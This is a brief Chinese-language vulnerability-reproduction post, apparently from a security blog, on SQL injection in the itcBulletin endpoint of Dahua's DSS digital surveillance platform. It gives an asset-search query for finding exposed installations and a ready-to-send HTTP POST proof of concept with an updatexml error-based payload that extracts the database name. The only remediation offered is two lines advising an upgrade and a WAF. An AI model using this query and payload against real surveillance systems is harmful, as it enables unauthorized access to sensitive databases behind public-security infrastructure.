大华 DSS 城市安防数字监控系统 SQL 注入漏洞

漏洞简介

大华DSS数字监控系统itcBulletin接口对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,可通过注入漏洞获取数据库敏感信息。

资产测绘

app=“dahua-DSS”

大华 DSS 城市安防数字监控系统 SQL 注入漏洞_第1张图片

漏洞复现

POC:

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host:your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Length: 341
Accept-Encoding: gzip


  
    
      
 (updatexml(1,concat(0x7e,(select database()),0x7e),1))) and (1=1
      
    
  

大华 DSS 城市安防数字监控系统 SQL 注入漏洞_第2张图片

成功查询出当前数据库。

Sqlmap验证

修复建议

1.升级至应用最新版本
2.部署WAF防火墙进行防护。

你可能感兴趣的:(漏洞复现,sql,数据库,web安全)